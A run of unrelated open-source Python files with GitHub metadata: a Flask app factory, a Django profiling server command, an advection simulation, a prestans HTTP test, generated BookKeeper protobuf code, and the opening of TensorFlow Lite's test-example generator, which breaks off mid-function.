from __future__ import absolute_import
from flask import Flask
from werkzeug.serving import run_simple
from .views import Graphics
from flask_restful import Api
from flask_discoverer import Discoverer
from adsmutils import ADSFlask
def create_app(**config):
"""
Create the application and return it to the user
:return: flask.Flask application
"""
if config:
app = ADSFlask(__name__, static_folder=None, local_config=config)
else:
app = ADSFlask(__name__, static_folder=None)
app.url_map.strict_slashes = False
api = Api(app)
api.add_resource(Graphics, '/<string:bibcode>')
Discoverer(app)
return app
if __name__ == "__main__":
run_simple('0.0.0.0', 5555, create_app(), use_reloader=False, use_debugger=False)
| {
"content_hash": "21aed324b4a4c9319fad60f623b68633",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 85,
"avg_line_length": 25.225806451612904,
"alnum_prop": 0.6790281329923273,
"repo_name": "adsabs/graphics_service",
"id": "61029a2a36d25fc105487991100f5fca2d7d5597",
"size": "782",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "graphics_service/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "27351"
}
],
"symlink_target": ""
} |
"""
runprofileserver.py
Starts a lightweight Web server with profiling enabled.
Credits for kcachegrind support taken from lsprofcalltree.py go to:
David Allouche
Jp Calderone & Itamar Shtull-Trauring
Johan Dahlin
"""
import sys
from datetime import datetime
from django.conf import settings
from django.core.management.base import CommandError
from django_extensions.management.utils import signalcommand
from django_extensions.compat import CompatibilityBaseCommand as BaseCommand
try:
from django.contrib.staticfiles.handlers import StaticFilesHandler
USE_STATICFILES = 'django.contrib.staticfiles' in settings.INSTALLED_APPS
except ImportError as e:
USE_STATICFILES = False
class KCacheGrind(object):
def __init__(self, profiler):
self.data = profiler.getstats()
self.out_file = None
def output(self, out_file):
self.out_file = out_file
self.out_file.write('events: Ticks\n')
self._print_summary()
for entry in self.data:
self._entry(entry)
def _print_summary(self):
max_cost = 0
for entry in self.data:
totaltime = int(entry.totaltime * 1000)
max_cost = max(max_cost, totaltime)
self.out_file.write('summary: %d\n' % (max_cost,))
def _entry(self, entry):
out_file = self.out_file
code = entry.code
if isinstance(code, str):
out_file.write('fn=%s\n' % code)
else:
out_file.write('fl=%s\n' % code.co_filename)
out_file.write('fn=%s\n' % code.co_name)
inlinetime = int(entry.inlinetime * 1000)
if isinstance(code, str):
out_file.write('0 %s\n' % inlinetime)
else:
out_file.write('%d %d\n' % (code.co_firstlineno, inlinetime))
# recursive calls are counted in entry.calls
if entry.calls:
calls = entry.calls
else:
calls = []
if isinstance(code, str):
lineno = 0
else:
lineno = code.co_firstlineno
for subentry in calls:
self._subentry(lineno, subentry)
out_file.write("\n")
def _subentry(self, lineno, subentry):
out_file = self.out_file
code = subentry.code
if isinstance(code, str):
out_file.write('cfn=%s\n' % code)
out_file.write('calls=%d 0\n' % (subentry.callcount,))
else:
out_file.write('cfl=%s\n' % code.co_filename)
out_file.write('cfn=%s\n' % code.co_name)
out_file.write('calls=%d %d\n' % (subentry.callcount, code.co_firstlineno))
totaltime = int(subentry.totaltime * 1000)
out_file.write('%d %d\n' % (lineno, totaltime))
class Command(BaseCommand):
help = "Starts a lightweight Web server with profiling enabled."
args = '[optional port number, or ipaddr:port]'
def add_arguments(self, parser):
parser.add_argument(
'--noreload', action='store_false', dest='use_reloader',
default=True,
help='Tells Django to NOT use the auto-reloader.')
parser.add_argument(
'--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.')
parser.add_argument(
'--prof-path', dest='prof_path', default='/tmp',
help='Specifies the directory which to save profile information '
'in.')
parser.add_argument(
'--prof-file', dest='prof_file',
default='{path}.{duration:06d}ms.{time}',
help='Set filename format, default if '
'"{path}.{duration:06d}ms.{time}".')
parser.add_argument(
'--nomedia', action='store_true', dest='no_media', default=False,
help='Do not profile MEDIA_URL and ADMIN_MEDIA_URL')
parser.add_argument(
'--use-cprofile', action='store_true', dest='use_cprofile',
default=False,
help='Use cProfile if available, this is disabled per default '
'because of incompatibilities.')
parser.add_argument(
'--kcachegrind', action='store_true', dest='use_lsprof',
default=False,
help='Create kcachegrind compatible lsprof files, this requires '
'and automatically enables cProfile.')
if USE_STATICFILES:
parser.add_argument(
'--nostatic', action="store_false", dest='use_static_handler',
default=True,
help='Tells Django to NOT automatically serve static files '
'at STATIC_URL.')
parser.add_argument(
'--insecure', action="store_true", dest='insecure_serving',
default=False,
help='Allows serving static files even if DEBUG is False.')
@signalcommand
def handle(self, addrport='', *args, **options):
import django
import socket
import errno
from django.core.servers.basehttp import run
try:
from django.core.servers.basehttp import get_internal_wsgi_application as WSGIHandler
except ImportError:
from django.core.handlers.wsgi import WSGIHandler # noqa
try:
from django.core.servers.basehttp import AdminMediaHandler
HAS_ADMINMEDIAHANDLER = True
except ImportError:
HAS_ADMINMEDIAHANDLER = False
try:
from django.core.servers.basehttp import WSGIServerException as wsgi_server_exc_cls
except ImportError: # Django 1.6
wsgi_server_exc_cls = socket.error
if args:
raise CommandError('Usage is runserver %s' % self.args)
if not addrport:
addr = ''
port = '8000'
else:
try:
addr, port = addrport.split(':')
except ValueError:
addr, port = '', addrport
if not addr:
addr = '127.0.0.1'
if not port.isdigit():
raise CommandError("%r is not a valid port number." % port)
use_reloader = options.get('use_reloader', True)
shutdown_message = options.get('shutdown_message', '')
no_media = options.get('no_media', False)
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
def inner_run():
import os
import time
try:
import hotshot
HAS_HOTSHOT = True
except ImportError:
HAS_HOTSHOT = False # python 3.x
USE_CPROFILE = options.get('use_cprofile', False)
USE_LSPROF = options.get('use_lsprof', False)
if USE_LSPROF:
USE_CPROFILE = True
if USE_CPROFILE:
try:
import cProfile
USE_CPROFILE = True
except ImportError:
print("cProfile disabled, module cannot be imported!")
USE_CPROFILE = False
if USE_LSPROF and not USE_CPROFILE:
raise CommandError("Kcachegrind compatible output format required cProfile from Python 2.5")
if not HAS_HOTSHOT and not USE_CPROFILE:
raise CommandError("Hotshot profile library not found. (and not using cProfile)")
prof_path = options.get('prof_path', '/tmp')
prof_file = options.get('prof_file', '{path}.{duration:06d}ms.{time}')
if not prof_file.format(path='1', duration=2, time=3):
prof_file = '{path}.{duration:06d}ms.{time}'
print("Filename format is wrong. Default format used: '{path}.{duration:06d}ms.{time}'.")
def get_exclude_paths():
exclude_paths = []
media_url = getattr(settings, 'MEDIA_URL', None)
if media_url:
exclude_paths.append(media_url)
static_url = getattr(settings, 'STATIC_URL', None)
if static_url:
exclude_paths.append(static_url)
admin_media_prefix = getattr(settings, 'ADMIN_MEDIA_PREFIX', None)
if admin_media_prefix:
exclude_paths.append(admin_media_prefix)
return exclude_paths
def make_profiler_handler(inner_handler):
def handler(environ, start_response):
path_info = environ['PATH_INFO']
# when using something like a dynamic site middleware is could be necessary
# to refetch the exclude_paths every time since they could change per site.
if no_media and any(path_info.startswith(p) for p in get_exclude_paths()):
return inner_handler(environ, start_response)
path_name = path_info.strip("/").replace('/', '.') or "root"
profname = "%s.%d.prof" % (path_name, time.time())
profname = os.path.join(prof_path, profname)
if USE_CPROFILE:
prof = cProfile.Profile()
else:
prof = hotshot.Profile(profname)
start = datetime.now()
try:
return prof.runcall(inner_handler, environ, start_response)
finally:
# seeing how long the request took is important!
elap = datetime.now() - start
elapms = elap.seconds * 1000.0 + elap.microseconds / 1000.0
if USE_LSPROF:
kg = KCacheGrind(prof)
with open(profname, 'w') as f:
kg.output(f)
elif USE_CPROFILE:
prof.dump_stats(profname)
profname2 = prof_file.format(path=path_name, duration=int(elapms), time=int(time.time()))
profname2 = os.path.join(prof_path, "%s.prof" % profname2)
if not USE_CPROFILE:
prof.close()
os.rename(profname, profname2)
return handler
print("Validating models...")
if hasattr(self, 'check'):
self.check(display_num_errors=True)
else:
self.validate(display_num_errors=True)
print("\nDjango version %s, using settings %r" % (django.get_version(), settings.SETTINGS_MODULE))
print("Development server is running at http://%s:%s/" % (addr, port))
print("Quit the server with %s." % quit_command)
path = options.get('admin_media_path', '')
if not path:
admin_media_path = os.path.join(django.__path__[0], 'contrib/admin/static/admin')
if os.path.isdir(admin_media_path):
path = admin_media_path
else:
path = os.path.join(django.__path__[0], 'contrib/admin/media')
try:
handler = WSGIHandler()
if HAS_ADMINMEDIAHANDLER:
handler = AdminMediaHandler(handler, path)
if USE_STATICFILES:
use_static_handler = options.get('use_static_handler', True)
insecure_serving = options.get('insecure_serving', False)
if use_static_handler and (settings.DEBUG or insecure_serving):
handler = StaticFilesHandler(handler)
handler = make_profiler_handler(handler)
run(addr, int(port), handler)
except wsgi_server_exc_cls as e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
errno.EACCES: "You don't have permission to access that port.",
errno.EADDRINUSE: "That port is already in use.",
errno.EADDRNOTAVAIL: "That IP address can't be assigned-to.",
}
if not isinstance(e, socket.error): # Django < 1.6
ERRORS[13] = ERRORS.pop(errno.EACCES)
ERRORS[98] = ERRORS.pop(errno.EADDRINUSE)
ERRORS[99] = ERRORS.pop(errno.EADDRNOTAVAIL)
try:
if not isinstance(e, socket.error): # Django < 1.6
error_text = ERRORS[e.args[0].args[0]]
else:
error_text = ERRORS[e.errno]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
print(shutdown_message)
sys.exit(0)
if use_reloader:
from django.utils import autoreload
autoreload.main(inner_run)
else:
inner_run()
| {
"content_hash": "ab682f113cd00517fba2e66f8096e7f3",
"timestamp": "",
"source": "github",
"line_count": 316,
"max_line_length": 113,
"avg_line_length": 41.90506329113924,
"alnum_prop": 0.5416855459900317,
"repo_name": "jpadilla/django-extensions",
"id": "f08b81e13166f8d022f2c4c466035658cebbb330",
"size": "13257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_extensions/management/commands/runprofileserver.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "741"
},
{
"name": "HTML",
"bytes": "2168"
},
{
"name": "JavaScript",
"bytes": "39590"
},
{
"name": "Python",
"bytes": "468181"
}
],
"symlink_target": ""
} |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numerical_schemes
""" Define simulation parameters """
dt = 0.1 # s time step
dx = 0.5 # m spatial resolution
# Domain
x_w = - 15
x_e = 15
""" Initialize, dimensions, coordinates and variables """
x_dim = int((x_e - x_w)//dx)
C = np.zeros(x_dim, order='F')
x = np.linspace(x_w, x_e, x_dim)
u = np.zeros(x_dim,order='F')
""" choices of initial conditions """
C[x_dim//2:x_dim//2+10] = 1 # Step function
#C = np.random.random(x_dim) # Pulse of random values
# Wind distribution
u = [1 - 1/(1 + x**2) if x >= 0 else 0 for x in x]
""" Prepare the animation plot """
fig, ax = plt.subplots()
line, = ax.plot([],[], lw=2, label='C')
text = ax.text(0.20, 0.95, '', horizontalalignment='center',
verticalalignment='center', transform = ax.transAxes)
FONTSIZE = 16 # Plot fontsizes
animation_interval = 0 # Go as fast as possible
# Plot the wind distribution
ax.plot(x, u, label='Wind distribution')
def Init():
ax.set_xlim(x_w, x_e)
ax.set_ylim(0, 1.2)
ax.set_xlabel("x-axis position [m]", fontsize=FONTSIZE)
ax.set_ylabel("C", fontsize=FONTSIZE)
ax.set_title("One-dimensional advection simulation", fontsize=FONTSIZE)
ax.legend(loc='upper right')
line.set_data(x, C)
return line,
""" Simulation """
def Run(i):
global C
C = numerical_schemes.step_ftbs(dx, dt, u, C)
line.set_data(x, C)
text.set_text('Current time: ' + str(int(dt*i)) + ' s')
return line, text
ani = animation.FuncAnimation(fig, Run, frames=10**100,
interval=animation_interval, blit=True, init_func=Init)
plt.show()
| {
"content_hash": "8cde291d63ba29745e215d94c24b8317",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 75,
"avg_line_length": 30.4,
"alnum_prop": 0.6453349282296651,
"repo_name": "asura6/Fortran-Python-Advection-and-Diffusion-Models",
"id": "2762a2a79a42eb91e7353d23df71dccd4dbaf754",
"size": "1672",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Program_2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Fortran",
"bytes": "3476"
},
{
"name": "Makefile",
"bytes": "603"
},
{
"name": "Python",
"bytes": "9512"
}
],
"symlink_target": ""
} |
from prestans.http import STATUS
from prestans.rest import RequestHandler
import pytest
import unittest
class NoContentHandler(RequestHandler):
def get(self):
self.response.status = STATUS.NO_CONTENT
def test_app():
from webtest import TestApp
from prestans.rest import RequestRouter
api = RequestRouter([
('/no-content', NoContentHandler)
], application_name="api", debug=True)
return TestApp(app=api)
class Issue154(unittest.TestCase):
def test_204_header_omitted(self):
"""
Request should return no content with header omitted
"""
app = test_app()
resp = app.get('/no-content')
self.assertEqual(resp.status_int, STATUS.NO_CONTENT)
self.assertIsNone(resp.content_type)
| {
"content_hash": "39304233c3b2f6b074c264b6f6a64e7a",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 64,
"avg_line_length": 23.823529411764707,
"alnum_prop": 0.6518518518518519,
"repo_name": "anomaly/prestans",
"id": "7dfdbb5f7a5d306f3c9cba3afeb8840dab331553",
"size": "810",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/issues/test_issue154.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "44024"
},
{
"name": "Makefile",
"bytes": "1131"
},
{
"name": "Python",
"bytes": "531098"
}
],
"symlink_target": ""
} |
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='kv.proto',
package='bookkeeper.proto.kv',
syntax='proto3',
serialized_options=_b('\n%org.apache.bookkeeper.stream.proto.kvP\001'),
serialized_pb=_b('\n\x08kv.proto\x12\x13\x62ookkeeper.proto.kv\"\x8f\x01\n\x08KeyValue\x12\x0b\n\x03key\x18\x01 \x01(\x0c\x12\x17\n\x0f\x63reate_revision\x18\x02 \x01(\x03\x12\x14\n\x0cmod_revision\x18\x03 \x01(\x03\x12\x0f\n\x07version\x18\x04 \x01(\x03\x12\r\n\x05value\x18\x05 \x01(\x0c\x12\x11\n\tis_number\x18\x06 \x01(\x08\x12\x14\n\x0cnumber_value\x18\x07 \x01(\x03\"\xb8\x01\n\x05\x45vent\x12\x32\n\x04type\x18\x01 \x01(\x0e\x32$.bookkeeper.proto.kv.Event.EventType\x12)\n\x02kv\x18\x02 \x01(\x0b\x32\x1d.bookkeeper.proto.kv.KeyValue\x12.\n\x07prev_kv\x18\x03 \x01(\x0b\x32\x1d.bookkeeper.proto.kv.KeyValue\" \n\tEventType\x12\x07\n\x03PUT\x10\x00\x12\n\n\x06\x44\x45LETE\x10\x01\x42)\n%org.apache.bookkeeper.stream.proto.kvP\x01\x62\x06proto3')
)
_EVENT_EVENTTYPE = _descriptor.EnumDescriptor(
name='EventType',
full_name='bookkeeper.proto.kv.Event.EventType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PUT', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DELETE', index=1, number=1,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=332,
serialized_end=364,
)
_sym_db.RegisterEnumDescriptor(_EVENT_EVENTTYPE)
_KEYVALUE = _descriptor.Descriptor(
name='KeyValue',
full_name='bookkeeper.proto.kv.KeyValue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='bookkeeper.proto.kv.KeyValue.key', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='create_revision', full_name='bookkeeper.proto.kv.KeyValue.create_revision', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mod_revision', full_name='bookkeeper.proto.kv.KeyValue.mod_revision', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='version', full_name='bookkeeper.proto.kv.KeyValue.version', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='bookkeeper.proto.kv.KeyValue.value', index=4,
number=5, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='is_number', full_name='bookkeeper.proto.kv.KeyValue.is_number', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='number_value', full_name='bookkeeper.proto.kv.KeyValue.number_value', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=34,
serialized_end=177,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='bookkeeper.proto.kv.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='bookkeeper.proto.kv.Event.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='kv', full_name='bookkeeper.proto.kv.Event.kv', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='prev_kv', full_name='bookkeeper.proto.kv.Event.prev_kv', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_EVENT_EVENTTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=180,
serialized_end=364,
)
_EVENT.fields_by_name['type'].enum_type = _EVENT_EVENTTYPE
_EVENT.fields_by_name['kv'].message_type = _KEYVALUE
_EVENT.fields_by_name['prev_kv'].message_type = _KEYVALUE
_EVENT_EVENTTYPE.containing_type = _EVENT
DESCRIPTOR.message_types_by_name['KeyValue'] = _KEYVALUE
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
KeyValue = _reflection.GeneratedProtocolMessageType('KeyValue', (_message.Message,), dict(
DESCRIPTOR = _KEYVALUE,
__module__ = 'kv_pb2'
# @@protoc_insertion_point(class_scope:bookkeeper.proto.kv.KeyValue)
))
_sym_db.RegisterMessage(KeyValue)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
DESCRIPTOR = _EVENT,
__module__ = 'kv_pb2'
# @@protoc_insertion_point(class_scope:bookkeeper.proto.kv.Event)
))
_sym_db.RegisterMessage(Event)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| {
"content_hash": "77f7dcfec46129fb2ee19c4327916af7",
"timestamp": "",
"source": "github",
"line_count": 189,
"max_line_length": 755,
"avg_line_length": 38.714285714285715,
"alnum_prop": 0.7049337160038267,
"repo_name": "apache/bookkeeper",
"id": "51fedc3c7aed8f1b7c56d66b2ea8e3ad7b34ce68",
"size": "7396",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "stream/clients/python/bookkeeper/proto/kv_pb2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "11886"
},
{
"name": "C++",
"bytes": "17844"
},
{
"name": "Dockerfile",
"bytes": "11186"
},
{
"name": "Groovy",
"bytes": "48262"
},
{
"name": "Java",
"bytes": "15908174"
},
{
"name": "JavaScript",
"bytes": "12042"
},
{
"name": "Makefile",
"bytes": "6544"
},
{
"name": "Python",
"bytes": "215336"
},
{
"name": "Roff",
"bytes": "39396"
},
{
"name": "SCSS",
"bytes": "1345"
},
{
"name": "Shell",
"bytes": "183376"
},
{
"name": "Thrift",
"bytes": "1473"
}
],
"symlink_target": ""
} |
"""Generate a series of TensorFlow graphs that become tflite test cases.
Usage:
generate_examples <output directory>
bazel run //tensorflow/lite/testing:generate_examples
To more easily debug failures use (or override) the --save_graphdefs flag to
place text proto graphdefs into the generated zip files.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import operator
import os
import random
import re
import string
import tempfile
import traceback
import zipfile
import numpy as np
from six import StringIO
from six.moves import xrange
# TODO(aselle): Disable GPU for now
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# pylint: disable=g-import-not-at-top
import tensorflow as tf
from google.protobuf import text_format
# TODO(aselle): switch to TensorFlow's resource_loader
from tensorflow.lite.testing import generate_examples_report as report_lib
from tensorflow.lite.testing import string_util_wrapper
from tensorflow.python.framework import test_util
from tensorflow.python.framework import graph_util as tf_graph_util
from tensorflow.python.ops import rnn
from tensorflow.python.ops import array_ops
RANDOM_SEED = 342
TEST_INPUT_DEPTH = 3
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
KNOWN_BUGS = {
# TOCO doesn't support scalars as input.
# Concat doesn't work with a single input tensor
r"concat.*num_tensors=1": "67378344",
# Transposition in MatMul is not fully supported.
"fully_connected.*transpose_a=True": "67586970",
# Softmax graphs are too complex.
r"softmax.*dim=0": "67749831",
# BatchToSpaceND only supports 4D tensors.
r"batch_to_space_nd.*input_shape=\[8,2,2,2,1,1\]": "70594733",
# Div will use floordiv.
r"div.*int32": "72051395",
}
class Options(object):
"""All options for example generation."""
def __init__(self):
# Directory where the outputs will be go.
self.output_path = None
# Particular zip to output.
self.zip_to_output = None
# Path to toco tool.
self.toco = None
# If a particular model is affected by a known bug count it as a Toco
# error.
self.known_bugs_are_errors = False
# Raise an exception if any toco error is encountered.
self.ignore_converter_errors = False
# Include intermediate graphdefs in the output zip files.
self.save_graphdefs = False
# Whether the TFLite Flex converter is being used.
self.run_with_flex = False
# The function to convert a TensorFLow model to TFLite model.
# See the document for `toco_convert` function for its required signature.
# TODO(ycling): Decouple `toco_convert` function from this module, and
# remove the `toco` attribute in this class.
self.tflite_convert_function = toco_convert
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
self.known_bugs = KNOWN_BUGS
# A map from names to functions which make test cases.
_MAKE_TEST_FUNCTIONS_MAP = {}
# A decorator to register the make test functions.
# Usage:
# All the make_*_test should be registered. Example:
# @register_make_test_function()
# def make_conv_tests(options):
# # ...
# If a function is decorated by other decorators, it's required to specify the
# name explicitly. Example:
# @register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
# @test_util.enable_control_flow_v2
# def make_unidirectional_sequence_lstm_tests(options):
# # ...
def register_make_test_function(name=None):
def decorate(function, name=name):
if name is None:
name = function.__name__
_MAKE_TEST_FUNCTIONS_MAP[name] = function
return decorate
class ExtraTocoOptions(object):
"""Additional toco options besides input, output, shape."""
def __init__(self):
# Whether to ignore control dependency nodes.
self.drop_control_dependency = False
# Allow custom ops in the toco conversion.
self.allow_custom_ops = False
# Rnn states that are used to support rnn / lstm cells.
self.rnn_states = None
# Split the LSTM inputs from 5 inoputs to 18 inputs for TFLite.
self.split_tflite_lstm_inputs = None
def toco_options(data_types,
input_arrays,
output_arrays,
shapes,
extra_toco_options=ExtraTocoOptions()):
"""Create TOCO options to process a model.
Args:
data_types: input and inference types used by TOCO.
input_arrays: names of the input tensors
output_arrays: name of the output tensors
shapes: shapes of the input tensors
extra_toco_options: additional toco options
Returns:
the options in a string.
"""
shape_str = ":".join([",".join(str(y) for y in x) for x in shapes if x])
inference_type = "FLOAT"
# TODO(ahentz): if we get multi-input quantization to work we need this
# to change
if data_types[0] == "QUANTIZED_UINT8":
inference_type = "QUANTIZED_UINT8"
s = (" --input_data_types=%s" % ",".join(data_types) +
" --inference_type=%s" % inference_type +
" --input_format=TENSORFLOW_GRAPHDEF" + " --output_format=TFLITE" +
" --input_arrays=%s" % ",".join(input_arrays) +
" --output_arrays=%s" % ",".join(output_arrays))
if shape_str:
s += (" --input_shapes=%s" % shape_str)
if extra_toco_options.drop_control_dependency:
s += " --drop_control_dependency"
if extra_toco_options.allow_custom_ops:
s += " --allow_custom_ops"
if extra_toco_options.rnn_states:
s += (" --rnn_states='" + extra_toco_options.rnn_states + "'")
if extra_toco_options.split_tflite_lstm_inputs is not None:
if extra_toco_options.split_tflite_lstm_inputs:
s += " --split_tflite_lstm_inputs=true"
else:
s += " --split_tflite_lstm_inputs=false"
return s
def format_result(t):
"""Convert a tensor to a format that can be used in test specs."""
if t.dtype.kind not in [np.dtype(np.string_).kind, np.dtype(np.object_).kind]:
# Output 9 digits after the point to ensure the precision is good enough.
values = ["{:.9f}".format(value) for value in list(t.flatten())]
return ",".join(values)
else:
return string_util_wrapper.SerializeAsHexString(t.flatten())
def write_examples(fp, examples):
"""Given a list `examples`, write a text format representation.
The file format is csv like with a simple repeated pattern. We would ike
to use proto here, but we can't yet due to interfacing with the Android
team using this format.
Args:
fp: File-like object to write to.
examples: Example dictionary consiting of keys "inputs" and "outputs"
"""
def write_tensor(fp, x):
"""Write tensor in file format supported by TFLITE example."""
fp.write("dtype,%s\n" % x.dtype)
fp.write("shape," + ",".join(map(str, x.shape)) + "\n")
fp.write("values," + format_result(x) + "\n")
fp.write("test_cases,%d\n" % len(examples))
for example in examples:
fp.write("inputs,%d\n" % len(example["inputs"]))
for i in example["inputs"]:
write_tensor(fp, i)
fp.write("outputs,%d\n" % len(example["outputs"]))
for i in example["outputs"]:
write_tensor(fp, i)
def write_test_cases(fp, model_name, examples):
"""Given a dictionary of `examples`, write a text format representation.
The file format is protocol-buffer-like, even though we don't use proto due
to the needs of the Android team.
Args:
fp: File-like object to write to.
model_name: Filename where the model was written to, relative to filename.
examples: Example dictionary consiting of keys "inputs" and "outputs"
"""
fp.write("load_model: %s\n" % os.path.basename(model_name))
for example in examples:
fp.write("reshape {\n")
for t in example["inputs"]:
fp.write(" input: \"" + ",".join(map(str, t.shape)) + "\"\n")
fp.write("}\n")
fp.write("invoke {\n")
for t in example["inputs"]:
fp.write(" input: \"" + format_result(t) + "\"\n")
for t in example["outputs"]:
fp.write(" output: \"" + format_result(t) + "\"\n")
fp.write(" output_shape: \"" + ",".join([str(dim) for dim in t.shape]) +
"\"\n")
fp.write("}\n")
_TF_TYPE_INFO = {
tf.float32: (np.float32, "FLOAT"),
tf.float16: (np.float16, "FLOAT"),
tf.int32: (np.int32, "INT32"),
tf.uint8: (np.uint8, "QUANTIZED_UINT8"),
tf.int16: (np.int16, "QUANTIZED_INT16"),
tf.int64: (np.int64, "INT64"),
tf.bool: (np.bool, "BOOL"),
tf.string: (np.string_, "STRING"),
}
def create_tensor_data(dtype, shape, min_value=-100, max_value=100):
"""Build tensor data spreading the range [min_value, max_value)."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value-min_value)*np.random.random_sample(shape)+min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value+1, shape)
elif dtype == tf.bool:
value = np.random.choice([True, False], size=shape)
elif dtype == np.string_:
# Not the best strings, but they will do for some basic testing.
letters = list(string.ascii_uppercase)
return np.random.choice(letters, size=shape).astype(dtype)
return np.dtype(dtype).type(value) if np.isscalar(value) else value.astype(
dtype)
def create_scalar_data(dtype, min_value=-100, max_value=100):
"""Build scalar tensor data range from min_value to max_value exclusively."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value - min_value) * np.random.random() + min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value + 1)
return np.array(value, dtype=dtype)
def freeze_graph(session, outputs):
"""Freeze the current graph.
Args:
session: Tensorflow sessions containing the graph
outputs: List of output tensors
Returns:
The frozen graph_def.
"""
return tf_graph_util.convert_variables_to_constants(
session, session.graph.as_graph_def(), [x.op.name for x in outputs])
@register_make_test_function()
def make_control_dep_tests(options):
"""Make a set of tests that use control dependencies."""
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
